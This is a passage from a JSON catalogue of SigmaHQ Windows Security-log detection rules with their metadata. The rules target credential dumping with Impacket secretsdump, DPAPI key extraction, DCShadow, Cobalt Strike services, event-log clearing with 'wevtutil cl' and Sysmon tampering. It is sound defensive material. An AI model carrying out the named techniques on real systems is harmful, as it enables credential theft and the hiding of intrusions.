Systems), Wojciech Lesicki", "creation_date": "2021-05-26", "falsepositive": [ "Unknown" ], "filename": "win_security_cobaltstrike_service_installs.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/", "https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/", "https://www.sans.org/webcasts/119395", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_cobaltstrike_service_installs.yml" ], "tags": [ "attack.execution", "attack.privilege-escalation", "attack.lateral-movement", "attack.t1021.002", "attack.t1543.003", "attack.t1569.002" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d7a95147-145f-4678-b85d-d1ff4a3bb3f6", "value": "CobaltStrike Service Installations - Security" }, { "description": "Detects DCShadow via create new SPN", "meta": { "author": "Ilyas Ochkov, oscd.community, Chakib Gzenayi (@Chak092), Hosni Mribah", "creation_date": "2019-10-25", "falsepositive": [ "Valid on domain controllers; exclude known DCs" ], "filename": "win_security_possible_dc_shadow.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/gentilkiwi/status/1003236624925413376", "https://web.archive.org/web/20180203014709/https://blog.alsid.eu/dcshadow-explained-4510f52fc19d?gi=c426ac876c48", "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_possible_dc_shadow.yml" ], "tags": [ "attack.credential-access", "attack.t1207" ] }, "related": [ { "dest-uuid": "564998d8-ab3e-4123-93fb-eccaa6b9714a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "32e19d25-4aed-4860-a55a-be99cb0bf7ed", "value": "Possible DC Shadow Attack" }, { "description": "Detects the mount of an ISO image on an endpoint", "meta": { "author": "Syed Hasan (@syedhasan009)", "creation_date": "2021-05-29", "falsepositive": [ "Software installation ISO files" ], "filename": "win_security_iso_mount.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/vinfo/hk-en/security/news/cybercrime-and-digital-threats/malicious-spam-campaign-uses-iso-image-files-to-deliver-lokibot-and-nanocore", "https://twitter.com/MsftSecIntel/status/1257324139515269121", "https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1553.005/T1553.005.md#atomic-test-1---mount-iso-image", "https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_iso_mount.yml" ], "tags": [ "attack.initial-access", "attack.t1566.001" ] }, "related": [ { "dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0248a7bc-8a9a-4cd8-a57e-3ae8e073a073", "value": "ISO Image Mounted" }, { "description": "Detects the creation of a local hidden user account which should not happen for event ID 4720.", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-05-03", "falsepositive": [ "Unknown" ], "filename": 
"win_security_hidden_user_creation.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/SBousseaden/status/1387743867663958021", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_hidden_user_creation.yml" ], "tags": [ "attack.persistence", "attack.t1136.001" ] }, "related": [ { "dest-uuid": "635cbe30-392d-4e27-978e-66774357c762", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7b449a5e-1db5-4dd0-a2dc-4e3a67282538", "value": "Hidden Local User Creation" }, { "description": "Detects local user creation on Windows servers, which shouldn't happen in an Active Directory environment. Apply this Sigma Use Case on your Windows server logs and not on your DC logs.\n", "meta": { "author": "Patrick Bareiss", "creation_date": "2019-04-18", "falsepositive": [ "Domain Controller Logs", "Local accounts managed by privileged account management tools" ], "filename": "win_security_user_creation.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://patrick-bareiss.com/detecting-local-user-creation-in-ad-with-sigma/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_user_creation.yml" ], "tags": [ "attack.persistence", "attack.t1136.001" ] }, "related": [ { "dest-uuid": "635cbe30-392d-4e27-978e-66774357c762", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "66b6be3d-55d0-4f47-9855-d69df21740ea", "value": "Local User Creation" }, { "description": "Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\\Windows\\System32\\wbem\\` directory over the network for a WMI DLL Hijack scenario.", "meta": { "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", "creation_date": "2020-10-12", "falsepositive": [ 
"Unknown" ], "filename": "win_security_wmiprvse_wbemcomn_dll_hijack.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/201009-RemoteWMIWbemcomnDLLHijack/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_wmiprvse_wbemcomn_dll_hijack.yml" ], "tags": [ "attack.execution", "attack.t1047", "attack.lateral-movement", "attack.t1021.002" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f6c68d5f-e101-4b86-8c84-7d96851fd65c", "value": "T1047 Wmiprvse Wbemcomn DLL Hijack" }, { "description": "Detects access to a protected_storage service over the network. 
Potential abuse of DPAPI to extract domain backup keys from Domain Controllers", "meta": { "author": "Roberto Rodriguez @Cyb3rWard0g", "creation_date": "2019-08-10", "falsepositive": [ "Unknown" ], "filename": "win_security_protected_storage_service_access.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/190620-DomainDPAPIBackupKeyExtraction/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_protected_storage_service_access.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.002" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "45545954-4016-43c6-855e-eae8f1c369dc", "value": "Protected Storage Service Access" }, { "description": "Detects the renaming of a file during deletion with the SDelete tool.", "meta": { "author": "Thomas Patzke", "creation_date": "2017-06-14", "falsepositive": [ "Legitimate usage of SDelete" ], "filename": "win_security_susp_sdelete.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-gb/sysinternals/downloads/sdelete", "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/sdelete.htm", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_sdelete.yml" ], "tags": [ "attack.impact", "attack.defense-evasion", "attack.t1070.004", "attack.t1027.005", "attack.t1485", "attack.t1553.002", "attack.s0195" ] }, "related": [ { "dest-uuid": "d63a3fb8-9452-4e9d-a60a-54be68d5998c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b0533c6e-8fea-4788-874f-b799cacc4b92", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "32901740-b42c-4fdd-bc02-345b5dc57082", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "39a80702-d7ca-4a83-b776-525b1f86a36d", "value": "Secure Deletion with SDelete" }, { "description": "Detects possible addition of shadow credentials to an active directory object.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Elastic (idea)", "creation_date": "2022-10-17", "falsepositive": [ "Modifications in the msDS-KeyCredentialLink attribute can be done legitimately by the Azure AD Connect synchronization account or the ADFS service account. These accounts can be added as Exceptions. (From elastic FP section)" ], "filename": "win_security_susp_possible_shadow_credentials_added.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/SBousseaden/status/1581300963650187264?", "https://cyberstoph.org/posts/2022/03/detecting-shadow-credentials/", "https://www.elastic.co/guide/en/security/8.4/potential-shadow-credentials-added-to-ad-object.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_possible_shadow_credentials_added.yml" ], "tags": [ "attack.credential-access", "attack.t1556" ] }, "related": [ { "dest-uuid": "f4c1826f-a322-41cd-9557-562100848c84", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f598ea0c-c25a-4f72-a219-50c44411c791", "value": "Possible Shadow Credentials Added" }, { "description": "This detection uses Windows security events to detect suspicious access attempts to the registry key of Azure AD Health monitoring agent.\nThis 
detection requires an access control entry (ACE) on the system access control list (SACL) of the following securable object HKLM\\SOFTWARE\\Microsoft\\Microsoft Online\\Reporting\\MonitoringAgent.\n", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", "creation_date": "2021-08-26", "falsepositive": [ "Unknown" ], "filename": "win_security_aadhealth_mon_agent_regkey_access.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://o365blog.com/post/hybridhealthagent/", "https://github.com/OTRF/Set-AuditRule/blob/c3dec5443414231714d850565d364ca73475ade5/rules/registry/aad_connect_health_monitoring_agent.yml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_aadhealth_mon_agent_regkey_access.yml" ], "tags": [ "attack.discovery", "attack.t1012" ] }, "related": [ { "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ff151c33-45fa-475d-af4f-c2f93571f4fe", "value": "Azure AD Health Monitoring Agent Registry Keys Access" }, { "description": "Detects scenario where weak encryption is enabled for a user profile which could be used for hash/password cracking.", "meta": { "author": "@neu5ron", "creation_date": "2017-07-30", "falsepositive": [ "Unknown" ], "filename": "win_security_alert_enable_weak_encryption.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://adsecurity.org/?p=2053", "https://blog.harmj0y.net/redteaming/another-word-on-delegation/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_alert_enable_weak_encryption.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f6de9536-0441-4b3f-a646-f4e00f300ffd", "value": "Weak Encryption Enabled and Kerberoast" }, { "description": "Detects an access to authentication tokens and accounts of Microsoft Teams desktop application.", "meta": { "author": "@SerkinValery", "creation_date": "2022-09-16", "falsepositive": [ "Unknown" ], "filename": "win_security_teams_suspicious_objectaccess.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.vectra.ai/blogpost/undermining-microsoft-teams-security-by-mining-tokens", "https://www.bleepingcomputer.com/news/security/microsoft-teams-stores-auth-tokens-as-cleartext-in-windows-linux-macs/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_teams_suspicious_objectaccess.yml" ], "tags": [ "attack.credential-access", "attack.t1528" ] }, "related": [ { "dest-uuid": "890c9858-598c-401d-a4d5-c67ebcdd703a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "25cde13e-8e20-4c29-b949-4e795b76f16f", "value": "Suspicious Teams Application Related ObjectAcess Event" }, { "description": "Detect scenarios where a potentially unauthorized application or user is modifying the system time.", "meta": { "author": "@neu5ron", "creation_date": "2019-02-05", "falsepositive": [ "HyperV or other virtualization technologies with binary not listed in filter portion of detection" ], "filename": "win_security_susp_time_modification.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4616", "Live environment caused by malware", "Private Cuckoo Sandbox (from many years ago, no longer have hash, NDA as well)", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_time_modification.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.006" ] }, "related": [ { "dest-uuid": "47f2d673-ca62-47e9-929b-1b0be9657611", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "faa031b5-21ed-4e02-8881-2591f98d82ed", "value": "Unauthorized System Time Modification" }, { "description": "Detects unusual processes accessing desktop.ini remotely over network share, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.", "meta": { "author": "Tim Shelton (HAWK.IO)", "creation_date": "2021-12-06", "falsepositive": [ "Read only access list authority" ], "filename": "win_security_net_share_obj_susp_desktop_ini.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_net_share_obj_susp_desktop_ini.yml" ], "tags": [ "attack.persistence", "attack.t1547.009" ] }, "related": [ { "dest-uuid": "4ab929c6-ee2d-4fb5-aab4-b14be2ed7179", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "35bc7e28-ee6b-492f-ab04-da58fcf6402e", "value": "Windows Network Access Suspicious desktop.ini Action" }, { "description": "Detects execution of NoFilter, a tool for abusing the Windows Filtering Platform for privilege escalation via hardcoded policy name indicators\n", "meta": { "author": "Stamatis Chatzimangou (st0pp3r)", "creation_date": "2024-01-05", "falsepositive": [ "Unknown" ], "filename": "win_security_hktl_nofilter.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ 
"https://github.com/deepinstinct/NoFilter/blob/121d215ab130c5e8e3ad45a7e7fcd56f4de97b4d/NoFilter/Consts.cpp", "https://github.com/deepinstinct/NoFilter", "https://x.com/_st0pp3r_/status/1742203752361128162?s=20", "https://www.deepinstinct.com/blog/nofilter-abusing-windows-filtering-platform-for-privilege-escalation", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_hktl_nofilter.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1134", "attack.t1134.001" ] }, "related": [ { "dest-uuid": "dcaa092b-7de9-4a21-977f-7fcb77e89c48", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "86850eff-2729-40c3-b85e-c4af26da4a2d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7b14c76a-c602-4ae6-9717-eff868153fc0", "value": "HackTool - NoFilter Execution" }, { "description": "Rule to detect the Hybrid Connection Manager service installation.", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2021-04-12", "falsepositive": [ "Legitimate use of Hybrid Connection Manager via Azure function apps." 
], "filename": "win_security_hybridconnectionmgr_svc_installation.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/Cyb3rWard0g/status/1381642789369286662", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_hybridconnectionmgr_svc_installation.yml" ], "tags": [ "attack.persistence", "attack.t1554" ] }, "related": [ { "dest-uuid": "960c3c86-1480-4d72-b4e0-8c242e84a5c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0ee4d8a5-4e67-4faf-acfa-62a78457d1f2", "value": "HybridConnectionManager Service Installation" }, { "description": "Detects potential attempts made to set the Directory Services Restore Mode administrator password.\nThe Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers.\nAttackers may change the password in order to obtain persistence.\n", "meta": { "author": "Thomas Patzke", "creation_date": "2017-02-19", "falsepositive": [ "Initial installation of a domain controller." 
], "filename": "win_security_susp_dsrm_password_change.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4794", "https://adsecurity.org/?p=1714", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_dsrm_password_change.yml" ], "tags": [ "attack.persistence", "attack.t1098" ] }, "related": [ { "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "53ad8e36-f573-46bf-97e4-15ba5bf4bb51", "value": "Password Change on Directory Service Restore Mode (DSRM) Account" }, { "description": "Detect AD credential dumping using impacket secretdump HKTL", "meta": { "author": "Samir Bousseaden, wagga", "creation_date": "2019-04-03", "falsepositive": [ "Unknown" ], "filename": "win_security_impacket_secretdump.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20230329153811/https://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_impacket_secretdump.yml" ], "tags": [ "attack.credential-access", "attack.t1003.002", "attack.t1003.004", "attack.t1003.003" ] }, "related": [ { "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1ecfdab8-7d59-4c98-95d4-dc41970f57fc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
"252902e3-5830-4cf6-bf21-c22083dfd5cf", "value": "Possible Impacket SecretDump Remote Activity" }, { "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-01-10", "falsepositive": [ "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", "System provisioning (system reset before the golden image creation)" ], "filename": "win_security_audit_log_cleared.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/deviouspolack/status/832535435960209408", "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100", "https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/SecurityEventLogCleared.yaml", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_audit_log_cleared.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.001", "car.2016-04-002" ] }, "related": [ { "dest-uuid": "6495ae23-3ab4-43c5-a94f-5638a2c31fd2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d99b79d2-0a6f-4f46-ad8b-260b6e17f982", "value": "Security Eventlog Cleared" }, { "description": "Potential threat actor tampering with Sysmon manifest and eventually disabling it", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-07-14", "falsepositive": [ "Unknown" ], "filename": "win_security_sysmon_channel_reference_deletion.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://securityjosh.github.io/2020/04/23/Mute-Sysmon.html", "https://twitter.com/SecurityJosh/status/1283027365770276866", 
"https://gist.github.com/Cyb3rWard0g/cf08c38c61f7e46e8404b38201ca01c8", "https://twitter.com/Flangvik/status/1283054508084473861", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_sysmon_channel_reference_deletion.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "18beca67-ab3e-4ee3-ba7a-a46ca8d7d0cc", "value": "Sysmon Channel Reference Deletion" }, { "description": "Detects execution of PsExec or PAExec with a renamed service name. This rule helps to filter out the noise when PsExec is used for legitimate purposes, or when an attacker uses a PsExec client other than the Sysinternals one.", "meta": { "author": "Samir Bousseaden", "creation_date": "2019-04-03", "falsepositive": [ "Unknown" ], "filename": "win_security_susp_psexec.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20230329171218/https://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_psexec.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.002" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c462f537-a1e3-41a6-b5fc-b2c2cef9bf82", "value": "Suspicious PsExec Execution" }, { "description": "Detects external disk drives or plugged-in USB devices.", "meta": { "author": "Keith Wright", "creation_date": "2019-11-20", "falsepositive": [ "Likely" ], "filename": "win_security_external_device.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ 
"https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-6416", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_external_device.yml" ], "tags": [ "attack.t1091", "attack.t1200", "attack.lateral-movement", "attack.initial-access" ] }, "related": [ { "dest-uuid": "3b744087-9945-4a6f-91e8-9dbceda417a4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "d40239b3-05ff-46d8-9bdd-b46d13463ef9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f69a87ea-955e-4fb4-adb2-bb9fd6685632", "value": "External Disk Drive Or USB Storage Device Was Recognized By The System" }, { "description": "Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.", "meta": { "author": "Roberto Rodriguez @Cyb3rWard0g", "creation_date": "2019-07-26", "falsepositive": [ "Unknown" ], "filename": "win_security_ad_replication_non_machine_account.yml", "level": "critical", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/180815-ADObjectAccessReplication/notebook.html", "https://threathunterplaybook.com/hunts/windows/190101-ADModDirectoryReplication/notebook.html", "https://threathunterplaybook.com/library/windows/active_directory_replication.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_ad_replication_non_machine_account.yml" ], "tags": [ "attack.credential-access", "attack.t1003.006" ] }, "related": [ { "dest-uuid": "f303a39a-6255-4b89-aecc-18c4d8ca7163", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "17d619c1-e020-4347-957e-1d1207455c93", "value": "Active Directory Replication from Non Machine Account" }, 
{ "description": "Detects the creation or removal of a computer. Can be used to detect attacks such as DCShadow via the creation of a new SPN.", "meta": { "author": "frack113", "creation_date": "2022-10-14", "falsepositive": [ "Unknown" ], "filename": "win_security_add_remove_computer.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4743", "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/event-4741", "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_add_remove_computer.yml" ], "tags": [ "attack.defense-evasion", "attack.t1207" ] }, "related": [ { "dest-uuid": "564998d8-ab3e-4123-93fb-eccaa6b9714a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "20d96d95-5a20-4cf1-a483-f3bda8a7c037", "value": "Add or Remove Computer from DC" }, { "description": "Detects \"read access\" requests on the services registry key.\nAdversaries may execute their own malicious payloads by hijacking the Registry entries used by services.\nAdversaries may use flaws in the permissions for Registry keys related to services to redirect from the originally specified executable to one that they control, in order to launch their own code when a service starts.\n", "meta": { "author": "Center for Threat Informed Defense (CTID) Summiting the Pyramid Team", "creation_date": "2023-09-28", "falsepositive": [ "Likely from legitimate applications reading their key. 
Requires heavy tuning" ], "filename": "win_security_registry_permissions_weakness_check.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.011/T1574.011.md#atomic-test-1---service-registry-permissions-weakness", "https://center-for-threat-informed-defense.github.io/summiting-the-pyramid/analytics/service_registry_permissions_weakness_check/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_registry_permissions_weakness_check.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.privilege-escalation", "attack.t1574.011" ] }, "related": [ { "dest-uuid": "17cc750b-e95b-4d7d-9dde-49e0de24148c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "11d00fff-5dc3-428c-8184-801f292faec0", "value": "Service Registry Key Read Access Request" }, { "description": "Detects anyone attempting a backup of the DPAPI Master Key. This event gets generated at the source and not on the Domain Controller.", "meta": { "author": "Roberto Rodriguez @Cyb3rWard0g", "creation_date": "2019-08-10", "falsepositive": [ "If a computer is a member of a domain, DPAPI has a backup mechanism to allow unprotection of the data, which will trigger this event." 
], "filename": "win_security_dpapi_domain_masterkey_backup_attempt.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/190620-DomainDPAPIBackupKeyExtraction/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dpapi_domain_masterkey_backup_attempt.yml" ], "tags": [ "attack.credential-access", "attack.t1003.004" ] }, "related": [ { "dest-uuid": "1ecfdab8-7d59-4c98-95d4-dc41970f57fc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "39a94fd1-8c9a-4ff6-bf22-c058762f8014", "value": "DPAPI Domain Master Key Backup Attempt" }, { "description": "Detects a threat actor creating a file named `iertutil.dll` in the `C:\\Program Files\\Internet Explorer\\` directory over the network for a DCOM InternetExplorer DLL Hijack scenario.", "meta": { "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", "creation_date": "2020-10-12", "falsepositive": [ "Unknown" ], "filename": "win_security_dcom_iertutil_dll_hijack.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://threathunterplaybook.com/hunts/windows/201009-RemoteDCOMIErtUtilDLLHijack/notebook.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_dcom_iertutil_dll_hijack.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.002", "attack.t1021.003" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "68a0c5ed-bee2-4513-830d-5b0d650139bd", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c39f0c81-7348-4965-ab27-2fde35a1b641", "value": "DCOM InternetExplorer.Application Iertutil 
